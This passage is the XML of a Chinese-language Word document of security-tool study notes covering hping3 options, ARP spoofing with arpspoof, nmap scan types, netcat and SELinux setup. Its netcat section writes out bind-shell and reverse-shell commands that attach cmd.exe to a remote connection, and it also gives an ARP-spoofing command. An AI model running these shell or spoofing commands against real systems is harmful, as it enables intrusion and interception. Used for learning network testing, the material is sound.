          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ICMP 模式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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-C  --icmptype   icmp类型(默认echo请求)    // ICMP类型，缺省回显请求。</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -K  --icmpcode   icmp代号(默认0)     // ICMP代码。</w:t>
              <w:br/>
              <w:t xml:space="preserve">      --force-icmp 发送所有icmp类型(默认仅发送支持的类型)    // 强制ICMP类型。</w:t>
              <w:br/>
              <w:t xml:space="preserve">      --icmp-gw    设置ICMP重定向网关地址(默认0.0.0.0)    // ICMP重定向</w:t>
              <w:br/>
              <w:t xml:space="preserve">      --icmp-ts    等同 --icmp --icmptype 13 (ICMP 时间戳)            // icmp时间戳</w:t>
              <w:br/>
              <w:t xml:space="preserve">      --icmp-addr  等同 --icmp --icmptype 17 (ICMP 地址子网掩码)  // icmp子网地址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--icmp-help  显示其他icmp选项帮助      // ICMP帮助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0" w:id="60"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.2.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>UDP/TCP 模式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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-s  --baseport   base source port             (default random)              // 缺省随机源端口</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -p  --destport   [+][+]&lt;port&gt; destination port(default 0) ctrl+z inc/dec    // 缺省随机源端口</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -k  --keep       keep still source port      // 保持源端口</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -w  --win        winsize (default 64)        // win的滑动窗口。windows发送字节(默认64)</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -O  --tcpoff     set fake tcp data offset     (instead of tcphdrlen / 4)    // 设置伪造tcp数据偏移量(取代tcp地址长度除4)</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -Q  --seqnum     shows only tcp sequence number        // 仅显示tcp序列号</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -b  --badcksum   (尝试)发送具有错误IP校验和数据包。许多系统将修复发送数据包的IP校验和。所以你会得到错误UDP/TCP校验和。</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -M  --setseq     设置TCP序列号</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -L  --setack     设置TCP的ack   --------- (不是 TCP 的 ACK 标志位)</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -F  --fin        set FIN flag</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -S  --syn        set SYN flag</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -R  --rst        set RST flag</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -P  --push       set PUSH flag</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -A  --ack        set ACK flag   -----------（设置 TCP 的 ACK 标志 位）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -U  --urg        set URG flag      // 一大堆IP抱头的设置。</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -X  --xmas       set X unused flag (0x40)</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -Y  --ymas       set Y unused flag (0x80)</w:t>
              <w:br/>
              <w:t xml:space="preserve">  --tcpexitcode    使用last tcp-&gt; th_flags作为退出码</w:t>
              <w:br/>
              <w:t xml:space="preserve">  --tcp-mss        启用具有给定值的TCP MSS选项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--tcp-timestamp  启用TCP时间戳选项来猜测HZ/uptime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1" w:id="61"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.2.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Common //通用设置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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-d  --data       data size    (default is 0)    // 发送数据包大小，缺省是0。</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -E  --file       文件数据</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -e  --sign       添加“签名”</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -j  --dump       转储为十六进制数据包</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -J  --print      转储为可打印字符</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -B  --safe       启用“安全”协议</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -u  --end        告诉你什么时候--file达到EOF并防止倒回</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -T  --traceroute traceroute模式(等同使用 --bind 且--ttl 1)</w:t>
              <w:br/>
              <w:t xml:space="preserve">  --tr-stop        在traceroute模式下收到第一个不是ICMP时退出</w:t>
              <w:br/>
              <w:t xml:space="preserve">  --tr-keep-ttl    保持源TTL固定，仅用于监视一跳</w:t>
              <w:br/>
              <w:t xml:space="preserve">  --tr-no-rtt      不要在跟踪路由模式下计算/显示RTT信息 ARS包描述（新增功能，不稳定）</w:t>
              <w:br/>
              <w:t>ARS packet description (new, unstable)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--apd-send       发送APD描述数据包(参见docs / APD.txt)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2" w:id="62"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>dsniff命令</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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安装命令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sudo apt install dsniff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3" w:id="63"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>arp攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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arpspoof -i 本地网卡 -t 目的IP 伪造IP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4" w:id="64"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Nmap工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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5" w:id="65"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>nmap工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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6" w:id="66"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>扫描单个ip</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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默认发送一个arp的ping数据包，来探测目标主机在1-10000范围内所开放的端口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eg :nmap  172.20.10.2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显示过程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eg :nmap  -vv 172.20.10.2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7" w:id="67"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>扫描多个端口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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&lt;target ip1 address&gt; &lt;target ip2 address&gt;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 14.215.177.39 172.20.10.2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8" w:id="68"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>指定端口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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-p (range) &lt;target IP&gt;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namp -p 3389,20-200 192.168.227.133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9" w:id="69"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>其他</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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扫描除过某一个ip外的所有子网主机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192.168.227.1/24 -exclude 192.168.227.1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扫描除过某一个文件中的ip外的子网主机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10.130.1.1/24 -excludefile gov.txt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显示扫描的所有主机的列表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-sL 192.168.227.1/24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0" w:id="70"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>sP ping 扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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可以利用类似window/linux 系统下的ping方式进行扫描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-sP &lt;target ip&gt;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一般来说 我们会用这个命令去扫描内网的一个ip范围，用来做内网的主机发现。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-sP 192.168.227.1-255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1" w:id="71"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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sS SYN半开放扫描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-sS 192.168.227.1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 TCP扫描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-sT 192.168.227.133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 UDP扫描(4秒80，用icmp原理做的，协议时间有限制)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-sU 192.168.227.133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sF FIN标志的数据包扫描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-sF 192.168.227.133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sV Version版本检测扫描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-sV 192.168.227.133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 OS操作系统类型的探测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nmap -O 192.168.227.133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2" w:id="72"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4.6.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>常用参数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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-o：激活操作探测；</w:t>
              <w:br/>
              <w:t>-P0：值进行扫描，不ping主机；</w:t>
              <w:br/>
              <w:t>-PT：是同TCP的ping；</w:t>
              <w:br/>
              <w:t>-sV：探测服务版本信息；</w:t>
              <w:br/>
              <w:t>-sP：ping扫描，仅发现目标主机是否存活；</w:t>
              <w:br/>
              <w:t>-sS：TCP SYN扫描(半开放式扫描，扫描速度高且隐蔽性好)</w:t>
              <w:br/>
              <w:t>-sT: TCP 连接扫描(最基础，最稳定的扫描)</w:t>
              <w:br/>
              <w:t>-sF：也是tcp的扫描一种，发送一个FIN标志的数据包,发送一个设置了FIN标志的数据包并不需要完成TCP的握手,和sS扫描效果差不多，比sT速度快</w:t>
              <w:br/>
              <w:t>-ps：发送同步（SYN）报文；</w:t>
              <w:br/>
              <w:t>-PU：发送udp ping；</w:t>
              <w:br/>
              <w:t>-PE：强制执行直接的ICMPping；</w:t>
              <w:br/>
              <w:t>-PB：默认模式，可以使用ICMPping和TCPping；</w:t>
              <w:br/>
              <w:t>-6：使用IPv6地址；</w:t>
              <w:br/>
              <w:t>-v：得到更多选项信息；</w:t>
              <w:br/>
              <w:t>-d：增加调试信息地输出；</w:t>
              <w:br/>
              <w:t>-oN：以人们可阅读的格式输出；</w:t>
              <w:br/>
              <w:t>-oX：以xml格式向指定文件输出信息；</w:t>
              <w:br/>
              <w:t>-oM：以机器可阅读的格式输出；</w:t>
              <w:br/>
              <w:t>-A：使用所有高级扫描选项；</w:t>
              <w:br/>
              <w:t>--resume：继续上次执行完的扫描；</w:t>
              <w:br/>
              <w:t>-P 80：指定要扫描的端口80，多个端口用逗号隔开80,90，使用“-”表示端口范围80-90；</w:t>
              <w:br/>
              <w:t>-e：在多网络接口Linux系统中，指定扫描使用的网络接口；</w:t>
              <w:br/>
              <w:t>-g:将指定的端口作为源端口进行扫描；</w:t>
              <w:br/>
              <w:t>--ttl：指定发送的扫描报文的生存期；</w:t>
              <w:br/>
              <w:t>--packet-trace：显示扫描过程中收发报文统计；</w:t>
              <w:br/>
              <w:t>--scanflags：设置在扫描报文中的TCP标志。</w:t>
              <w:br/>
              <w:t>-sT: 全连接扫描，更慢，会被服务器记录日志，但不易被入侵检测系统检测到</w:t>
              <w:br/>
              <w:t>-Pn: 跳过Ping测试(防火墙)，扫描指定目标</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>-v: 详细模式V越多就越详细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3" w:id="73"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Nc工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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4" w:id="74"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>nc参数说明</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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-d 后台模式</w:t>
              <w:br/>
              <w:t>-e prog 程序重定向，一旦连接，就执行 [危险!!]</w:t>
              <w:br/>
              <w:t>-g gateway source-routing hop point[s], up to 8</w:t>
              <w:br/>
              <w:t>-G num source-routing pointer: 4, 8, 12, ...</w:t>
              <w:br/>
              <w:t>-h 帮助信息</w:t>
              <w:br/>
              <w:t>-i secs 延时的间隔</w:t>
              <w:br/>
              <w:t>-l 监听模式，用于入站连接</w:t>
              <w:br/>
              <w:t>-L 连接关闭后,仍然继续监听</w:t>
              <w:br/>
              <w:t>-n 指定数字的IP地址，不能用hostname</w:t>
              <w:br/>
              <w:t>-o file 记录16进制的传输</w:t>
              <w:br/>
              <w:t>-p port 本地端口号</w:t>
              <w:br/>
              <w:t>-r 随机本地及远程端口</w:t>
              <w:br/>
              <w:t>-s addr 本地源地址</w:t>
              <w:br/>
              <w:t>-t 使用TELNET交互方式</w:t>
              <w:br/>
              <w:t>-u UDP模式</w:t>
              <w:br/>
              <w:t>-v 详细输出--用两个-v可得到更详细的内容</w:t>
              <w:br/>
              <w:t>-w secs timeout的时间</w:t>
              <w:br/>
              <w:t>-z 将输入输出关掉--用于扫描时</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>端口的表示方法可写为M-N的范围格式。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5" w:id="75"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>基本用法：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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大概有以下几种用法：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1)连接到REMOTE主机，例子：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格式：nc -nvv 192.168.x.x 80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讲解：连到192.168.x.x的TCP80端口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2)监听LOCAL主机，例子：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格式：nc -l -p 80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讲解：监听本机的TCP80端口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3)扫描远程主机，例子：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格式：nc -nvv -w2 -z 192.168.x.x 80-445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讲解：扫描192.168.x.x的TCP80到TCP445的所有端口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4)REMOTE主机绑定SHELL，例子：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格式：nc -l -p 5354 -t -e c:winntsystem32cmd.exe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讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口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5)REMOTE主机绑定SHELL并反向连接，例子：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格式：nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354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讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口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6" w:id="76"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>常用命令</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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（1）tcp连接测试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telnet 192.168.20.101 8000</w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t>nc 192.168.20.101 8000</w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>nc -p 8081 192.168.20.101 8000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（2）UDP连接测试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nc -u 192.168.20.101 8000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（3）服务端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nc -l  0.0.0.0  8000</w:t>
              <w:br/>
              <w:t>0.0.0.0可以不带</w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>nc -lu 8000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7" w:id="77"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Selinux工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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8" w:id="78"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>详解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/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整合到2.6内核版本上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Enforing     强制模式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Permissive 警告模式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Deisabled  关闭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sysadm_r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>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sysadm_u : object_r : httpd_sys_conten_t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   角色   类型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policy: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(1) pam根据子系统/lib64/security/pam_selinux.so模块决定登录者运行程序安全上下文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(2) rpm包安装根据rpm包的记录生成安全上下文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(3) 手工建的，根据policy生成安全上下文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(4) cp，重新生成安全上下文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(5) mv，安全上下文不变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user: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user_u:普通用户登录后预设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system_u:开机过程系统进程；管理员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unconfined_u:非限制没有定义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role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>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type: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查看上下文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ls -Z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改变属性标签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chcon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安全上下文，文件默认配置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/etc/selinux/targeted/contexts/files/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9" w:id="79"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Ubuntu安装</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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Ubuntu默认安装的安全组件为AppArmor，要安装SElinux需要先移除AppArmor。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 1.使用systemctl停止Apparmor服务。</w:t>
              <w:br/>
              <w:t>sudo systemctl stop apparmor</w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t>2.从系统中清除AppArmor</w:t>
              <w:br/>
              <w:t>sudo apt purge apparmor</w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t>3.更新源</w:t>
              <w:br/>
              <w:t xml:space="preserve">sudo apt update </w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t>4.安装SELinux及相关包</w:t>
              <w:br/>
              <w:t>sudo apt install policycoreutils selinux-utils selinux-basics</w:t>
              <w:br/>
              <w:t>或</w:t>
              <w:br/>
              <w:t xml:space="preserve">sudo apt-get install policycoreutils </w:t>
              <w:br/>
              <w:t>sudo apt-get install selinux-utils</w:t>
              <w:br/>
              <w:t>sudo apt-get install selinux-basics</w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t>5.查看SELinux安装情况</w:t>
              <w:br/>
              <w:t>sudo selinux-activate</w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t>查看状态</w:t>
              <w:br/>
              <w:t>Sestatus</w:t>
              <w:br/>
              <w:t>或getenforce</w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t>6.将SELinux置于enforcing状态</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sudo selinux-config-enforcing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或修改配置文件/etc/selinux/config，将SELINUX=disabled改为 SELINUX=enforcing。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修改过之后一定要reboot系统才能生效。另外，开启了SElinux有可能导致ssh服务无法使用，从而影响ssh登陆功能，需要修改其规则才可。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0" w:id="80"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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1、/usr/sbin/sestatus -v      ##如果SELinux status参数为enabled即为开启状态</w:t>
              <w:br/>
              <w:t>SELinux status:                 enabled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2、getenforce                 ##也可以用这个命令检查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1" w:id="81"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>关闭SELinux方法：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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1、临时关闭（不用重启机器）：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代码如下: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setenforce 0 #设置SELinux 成为permissive模式</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>#setenforce 1 设置SELinux 成为enforcing模式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2、修改配置文件需要重启机器：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修改/etc/selinux/config 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将SELINUX=enforcing改为SELINUX=disabled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重启机器即可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2996">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22997">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22998">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22999">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23000">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23001">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
